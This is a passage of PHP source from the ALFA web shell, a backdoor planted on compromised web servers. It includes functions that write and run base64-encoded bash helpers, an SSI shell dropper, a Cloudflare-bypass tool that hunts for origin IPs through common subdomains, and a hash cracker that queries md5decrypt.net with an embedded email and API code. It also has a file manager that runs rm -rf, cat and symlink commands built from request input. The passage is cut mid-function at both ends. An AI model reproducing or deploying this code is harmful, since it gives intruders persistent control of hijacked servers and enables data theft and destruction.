                    if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){

                        @setcookie("alfa_checkupdate", "1", time()+86400);

                        $data["content"] = '
'.$json["content"].'
';

                    }

                }

            }

            if(isset($json["ads"]) && !empty($json["ads"])){

                $data["content"] .= $json["ads"];

            }

            if(isset($json["copyright"]) && !empty($json["copyright"])){

                $data["copyright"] = $json["copyright"];

            }

            if(isset($json["solevisible"]) && !empty($json["solevisible"])){

                $data["solevisible"] = $json["solevisible"];

            }

            if(isset($json["code_name"]) && !empty($json["code_name"])){

                $data["code_name"] = $json["code_name"];

                $data["version_number"] = __ALFA_VERSION__;

            }

            if(isset($json["market"]) && !empty($json["market"])){

                $data["market"] = $json["market"];

            }

            echo @json_encode($data);

        }

    }

}

function alfaWriteTocgiapi($name, $source){

    $temp = "";

    $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");

    if(in_array($name, $not_api)){

        $temp = ALFA_TEMPDIR;

        if($temp){

            @chdir($temp);

        }

    }else{

        alfaCreateParentFolder();

        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);

    }

    @mkdir('alfacgiapi',0755);

    __write_file("alfacgiapi/".$name, __get_resource($source));

    @chmod("alfacgiapi/".$name, 0755);

    return $temp;

}

function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}

function alfaupdateheader(){

    if(!isset($_COOKIE["updateheader_data"])){

        $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";

        $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));

        $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);

        $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);

        if(@is_array(@json_decode($data,true))){

            __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));

            echo $data;

        }

    }else{

        echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);

    }

}

function alfassiShell(){

alfahead();

echo '
';

alfaCreateParentFolder();

@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);

@mkdir('alfa_shtml',0755);

@chdir('alfa_shtml');

alfacgihtaccess('shtml');

$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';

@__write_file('alfa_ssi.shtml',__get_resource($code));

@chmod("alfa_ssi.shtml",0755);

echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');

echo '
';

alfafooter();

}

function alfacloudflare(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "

| Cloud Flare ByPasser |

>'); return false;\" method='post'>


Target:
  

";

if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){

$url = $_POST['alfa1'];

if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){

$url = preg_replace('/^(https?):\/\//', '', $url);

$url = "http://www.".$url;

}

$headers = @get_headers($url, 1);

$server = $headers['Server'];

$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');

if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){

if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{

$url = explode($matches[0], $url);

$url = $url[1];}}

if(is_array($server))$server = $server[0];

echo __pre();

if(preg_match('/cloudflare/i', $server))

echo "\n[+] CloudFlare detected: {$server}\n
";

else

echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";

echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n

";

echo "[+] Searching for more IP addresses.\n\n

";

for($x=0;$x";

}

echo "\n[+] Finished.\n
";

}

echo '
';

alfafooter();

}

function is_ipv4($ip){

return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';

}

function __alert($s){

echo ''.__pre().$s.'';

}

function create_table($data){

echo '';

foreach ($data as $key => $val){

$array = array();

foreach($val as $k => $v){

$array[$k] = $v;

}

echo "";

}

echo '
".$array['tdName']."
';

}

function alfaphp2xml(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "

| Shell For vBulletin |

>'); return false;\" method='post'>






";

if($_POST['alfa2']&&$_POST['alfa2']=='>>'){

echo __pre()."


';

}

echo '
';

alfafooter();

}

function alfacpcrack(){

alfahead();

echo '

| Hash Tools |

| DeCrypter | | Hash Analyzer | 
';

if($_POST['alfa1']=='dec'){

$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');

echo '
| DeCrypter |




Decrypt Method:
  

';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$hash_type = $_POST['alfa4'];

$email = "bookings@citytocountryretreat.com";

$code = "7b9fa79f92c3cd96";

$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;

$resp = @file_get_contents($target);

if($resp==''){

$get = new AlfaCURL();

$resp = $get->Send($target);

}

echo __pre().'';

switch($resp){

    case('CODE ERREUR : 001'):echo "You exceeded the 400 allowed request per day";break;

    case('CODE ERREUR : 003'):echo "Your request includes more than 400 hashes.";break;

    case('CODE ERREUR : 004'):echo "The type of hash you provide in the argument hash_type doesn't seem to be valid";break;

    case('CODE ERREUR : 005'):echo "The hash you provide doesn't seem to match with the type of hash you set.";break;

}

if(substr($resp,0,4)!='CODE'&&$resp!=''){

echo "Result: ".$resp."";

}elseif(substr($resp,0,4)!='CODE'){

echo "NoT Found
";

}

echo('');

}

}

}

if($_POST['alfa1']=='analyzer'){

echo '

| Hash Analyzer |





Hash: 
  

';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$curl = new AlfaCURL();

$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");

echo(__pre().'');

if(preg_match('#
(.*?)
#',$resp,$s)){

    echo(''.$s[1].'');

}else{

    echo('Not Found...!');

}

echo('
');

}

}

}

echo '
';

alfafooter();

}

function alfafooter(){

if(!isset($_POST['ajax'])){

echo "













Make File : 
 
Make Dir : 
 
Delete : 
 
Chmod : 
 
Change Dir : 
 
Read File : 
 
Execute :













Upload file: 















Sql Manager




















0
Database


0
Options


0
Editor


0
Cgi Shell










";?>







= 1073741824)

return sprintf('%1.2f', $s / 1073741824 ). ' GB';

elseif($s >= 1048576)

return sprintf('%1.2f', $s / 1048576 ) . ' MB';

elseif($s >= 1024)

return sprintf('%1.2f', $s / 1024 ) . ' KB';

else

return $s . ' B';

}

function alfaPerms($p) {

if (($p & 0xC000) == 0xC000)$i = 's';

elseif (($p & 0xA000) == 0xA000)$i = 'l';

elseif (($p & 0x8000) == 0x8000)$i = '-';

elseif (($p & 0x6000) == 0x6000)$i = 'b';

elseif (($p & 0x4000) == 0x4000)$i = 'd';

elseif (($p & 0x2000) == 0x2000)$i = 'c';

elseif (($p & 0x1000) == 0x1000)$i = 'p';

else $i = 'u';

$i .= (($p & 0x0100) ? 'r' : '-');

$i .= (($p & 0x0080) ? 'w' : '-');

$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));

$i .= (($p & 0x0020) ? 'r' : '-');

$i .= (($p & 0x0010) ? 'w' : '-');

$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));

$i .= (($p & 0x0004) ? 'r' : '-');

$i .= (($p & 0x0002) ? 'w' : '-');

$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));

return $i;

}

function alfaPermsColor($f,$isbash=false){

$class = "";

$num = "";

$human = "";

if($isbash){

$class = $f["class"];

$num = $f["num"];

$human = $f["human"];

}else{

$num = substr(sprintf('%o', @fileperms($f)),-4);

$human = alfaPerms(@fileperms($f));

if(!@is_readable($f))

$class = "main_red_perm";

elseif (!@is_writable($f))

$class = "main_white_perm";

else

$class = "main_green_perm";

}

return ''.$num.' >> '.$human.'';

}

if(!function_exists("scandir")) {

function scandir($dir) {

$dh = opendir($dir);

while (false !== ($filename = readdir($dh)))

$files[] = $filename;

return $files;

}

}

function reArrayFiles($file_post){

$file_ary = array();

$file_count = count($file_post['name']);

$file_keys = array_keys($file_post);

for ($i=0; $i<$file_count; $i++) {

foreach ($file_keys as $key) {

$file_ary[$i][$key] = $file_post[$key][$i];

}

}

return $file_ary;

}

function _alfa_can_runCommand($cgi=true,$cache=true){

    if(isset($_COOKIE["alfa_canruncmd"])&&$cache){

        return true;

    }

    if(strlen(alfaEx("whoami",false,$cgi))>0){

        $_COOKIE["alfa_canruncmd"] = true;

        return true;

    }

    return false;

}

function _alfa_symlink($target, $link){

    $phpsym = function_exists("symlink");

    if($phpsym){

        @symlink($target, $link);

    }else{

        alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");

    }

}

function _alfa_file_exists($file,$cgi=true){

    if(@file_exists($file)){

        return true;

    }else{

        if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){

            return true;

        }

    }

    return false;

}

function _alfa_file($file,$cgi=true){

    $array = @file($file);

    if(!$array){

        if(strlen(alfaEx("id",false,$cgi))>0){

            $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);

            if(strlen($data)>0){

                return explode("\n", $data);

            }else{

                return false;

            }

        }else{

            return false;

        }

    }else{

        return $array;

    }

}

function _alfa_is_writable($file){

    $check = false;

    $check = @is_writable($file);

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');

            if($check == "yes"){

                $check = true;

            }else{

                $check = false;

            }

        }

    }

    return $check;

}

function _alfa_is_dir($dir,$mode="-d"){

    $check = false;

    $check = @is_dir($dir);

    if($mode == "-e"){

        $check = @is_file($dir);

    }

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');

            if($check == "yes"){

                return true;

            }else{

                return false;

            }

        }

    }

    return $check;

}

function _alfa_load_ace_options($base){

    return 'Theme: Language: Soft Wrap:  | Font Size:  |  | ';

}

function alfaFilesMan2(){

    alfahead();

    AlfaNum(8,9,10,7,6,5,4);

    echo '

';

    alfaFooter();

}

function copy_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

function alfaFilesMan(){

if(!empty ($_COOKIE['alfa_f']))

$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);

if(!empty($_POST['alfa1'])){

switch($_POST['alfa1']){

case 'uploadFile':

$move_cmd_file = false;

$alfa_canruncmd = false;

if($GLOBALS['glob_chdir_false']){

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    $move_cmd_file = true;

}

if(_alfa_is_writable($GLOBALS['cwd'])){

$files = reArrayFiles($_FILES['f']);

$ret_files = array();

foreach($files as $file){

if($move_cmd_file&&$alfa_canruncmd){

    alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");

}else{

    if(@move_uploaded_file($file['tmp_name'],$file['name'])){

        $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");

        $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");

        $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");

        $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");

        $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));

        $file_perm = alfaPermsColor($file['name']);

        $file_size = @filesize($file['name']);

        $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);

    }

}

}

if(!$move_cmd_file){

    echo json_encode($ret_files);

}

}else{

    echo "noperm";

    return;

}

if(!$move_cmd_file){

return;

}

break;

case 'mkdir':

$new_dir_cmd = false;

if($GLOBALS['glob_chdir_false']){

    if(_alfa_can_runCommand(true,true)){

        if(_alfa_is_writable($GLOBALS['cwd'])){

            if(!_alfa_is_dir(trim($_POST['alfa2']))){

                alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");

                echo "";

            }else{

                echo "";

            }

        }else{

            echo "";

        }

    }else{

        echo "";

    }

}else{

    if(_alfa_is_writable($GLOBALS['cwd'])){

        if(!_alfa_is_dir(trim($_POST['alfa2']))){

            if(!@mkdir(trim($_POST['alfa2']))){

                echo "";

            }else{

                echo "";

            }

        }else{

            echo "";

        }

    }else{

        echo "";

    }

}

break;

case 'delete':

function deleteDir($path){

$path = (substr($path,-1)=='/') ? $path:$path.'/';

$dh = @opendir($path);

while(($item = @readdir($dh)) !== false){

$item = $path.$item;

if((basename($item) == "..") || (basename($item) == "."))

continue;

$type = @filetype($item);

if ($type == "dir")

deleteDir($item);

else

@unlink($item);

}

@closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST['f']))

foreach($_POST['f'] as $f){

if($f == '..')

continue;

$f = rawurldecode($f);

if($GLOBALS["glob_chdir_false"]){

    if(_alfa_can_runCommand(true,true)){

        alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");

    }

}else{

alfaEx("rm -rf '".addslashes($f)."'",false,false);

if(@is_dir($f))

deleteDir($f);

else

@unlink($f);

}

}

if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){

deleteDir(rawurldecode(@$_POST['alfa2']));

alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);

}else{

@unlink(rawurldecode(@$_POST['alfa2']));

}

if($GLOBALS["glob_chdir_false"]){

    $source = rawurldecode(@$_POST['alfa2']);

    if($source!='..'&&!empty($source)){

        if(_alfa_can_runCommand(true,true)){

            alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");

        }

    }

}

if(is_array($_POST['f']))

return;

break;

case 'paste':

if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){

foreach($_COOKIE['alfa_f'] as $f)

copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);

}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){

function move_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if(($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

}elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE['alfa_f'] as $f)

@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);

}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

$zipX = "alfa_".rand(1,1000).".zip";

if($zip->open($zipX, 1)){

@chdir($_COOKIE['alfa_c']);

foreach($_COOKIE['alfa_f'] as $f){

if($f == '..')continue;

if(@is_file($_COOKIE['alfa_c'].$f))

$zip->addFile($_COOKIE['alfa_c'].$f, $f);

elseif(@is_dir($_COOKIE['alfa_c'].$f)){

$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));

foreach($iterator as $key=>$value){

$key = str_replace('\\','/',realpath($key));

if(@is_dir($key)){

if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;

}else{$zip->addFile($key,$key);}}}}

@chdir($GLOBALS['cwd']);

$zip->close();

__alert('>> '.$zipX.' << is created...');}}

}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

foreach($_COOKIE['alfa_f'] as $f) {

if($zip->open($_COOKIE['alfa_c'].$f)){

$zip->extractTo($_COOKIE['alfa_cwd']);

$zip->close();}}}}

unset($_COOKIE['alfa_f']);

break;

default:

if(!empty($_POST['alfa1'])){

if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){

__alfa_set_cookie('alfa_act', @$_POST['alfa1']);

__alfa_set_cookie('alfa_f', @serialize($_POST['f']));

__alfa_set_cookie('alfa_c', @$_POST['c']);

return;

}

}

break;

}

}

$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);

if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){

    $path = explode('/', $res[1]);

    array_pop($path);

    $_POST['c'] = implode('/', $path);

}

$cmd_dir = false;

if($dirContent === false){

    if(_alfa_can_runCommand(true,true)){

        $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];

        @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

        if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){

            $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";

            $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);

            __alfa_set_cookie("alfachdir_bash", "true");

            __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);

        }

        $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");

        $dirContent = json_decode($dirContent, true);

        if(is_array($dirContent)){

            array_pop($dirContent);

            $cmd_dir = true;

        }else{

            $dirContent = false;

        }

    }

}

alfahead();

AlfaNum(8,9,10,7,6,5,4);

$count_dirContent = @count($dirContent);

if($count_dirContent > 300){

    @$_COOKIE["alfa_limited_files"] = 100;

}

$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';

$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;

$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;

$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';

$files_page_count = 1;

if($alfa_limited_files > 0){

    $files_page_count = ceil($count_dirContent/$alfa_limited_files);

    if($files_page_count > 1){

        $files_page_count++;

    }

}

echo '
Filter: Sort By: Direction:  limit: Files Count: '.($count_dirContent-1).'
';

if($dirContent == false){

echo '
!!! Access Denied !!!

';

alfaFooter();

return;

}

global $sort;

$sort = array('name', 1);

if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){

    $sort[0] = $_COOKIE["alfa_sort_by"];

}

if(!empty($_POST['alfa1'])) {

if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))

$sort = array($match[1], (int)$match[2]);

}

if($alfa_files_page_number > ($files_page_count-1)){

    $alfa_files_page_number = 1;

}

$checkbox_rand = rand(11111, 99999);

echo "
";

$dirs = $files = array();

$n = $count_dirContent;

if($n > $alfa_limited_files && $alfa_limited_files > 0){

    $n = ($alfa_limited_files * $alfa_files_page_number);

    if($n > $count_dirContent){

        $n = $count_dirContent;

    }

}

$i = 0;

if($alfa_limited_files > 0 && $alfa_files_page_number > 1){

    $i = $alfa_limited_files * ($alfa_files_page_number - 1);

}

$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);

$cmd_dir_backp = "";

for(;$i<$n;$i++){

if($cmd_dir){

$filename = $dirContent[$i]["name"];

$file_owner = $dirContent[$i]["owner"];

$file_group = $dirContent[$i]["group"];

$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);

$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);

$file_size = $dirContent[$i]["size"];

if(substr($dirContent[$i]["name"], 0 ,1) == "/"){

$file_path = $dirContent[$i]["name"];

$dirContent[$i]["name"] = "..";

$filename = $dirContent[$i]["name"];

}else{

$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];

}

}else{

$filename = $dirContent[$i];

$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");

$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");

$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");

$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");

$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));

$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);

$file_size = @filesize($GLOBALS['cwd'].$filename);

$file_path = $GLOBALS['cwd'].$filename;

}

$tmp = array('name' => $filename,

'path' => $file_path,

'modify' => $file_modify,

'perms' => $file_perm,

'size' => $file_size,

'owner' => $file_owner,

'group' => $file_group

);

if($filename == ".." && !$cmd_dir){

    $tmp["path"] = str_replace("\\", "/", realpath($file_path));

}

if(!$cmd_dir){

if(@is_file($file_path)){

$arr_mrg = array('type' => 'file');

if(@is_link($file_path)){

$arr_mrg["link"] = readlink($tmp['path']);

}

$files[] = array_merge($tmp, $arr_mrg);

}elseif(@is_link($file_path)){

$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));

}elseif(@is_dir($file_path)&& ($filename != ".")){

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

}else{

    if($dirContent[$i]["type"]=="file"){

        $files[] = array_merge($tmp, array('type' => 'file'));

    }else{

        if($dirContent[$i]["name"] != "."){

            $dirs[] = array_merge($tmp, array('type' => 'dir'));

        }

    }

}

}

$GLOBALS['sort'] = $sort;

function alfaCmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);

}

usort($files, "alfaCmp");

usort($dirs, "alfaCmp");

if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){

    if($_COOKIE["alfa_filesman_direction"] == 'desc'){

        $files = array_reverse($files);

        $dirs = array_reverse($dirs);

    }

}

$files = array_merge($dirs, $files);

$l=0;

$cc=0;

foreach($files as $f){

$f['name'] = htmlspecialchars($f['name']);

$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];

$checkbox = 'checkbox_'.$checkbox_rand.$cc;

$raw_name = rawurlencode($f['name']);

$icon = $GLOBALS['DB_NAME']['show_icons']?'':'';

$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';

echo '';

$l = $l?0:1;

$cc++;

}

echo "
NameSizeModifyOwner/GroupPermissionsActions
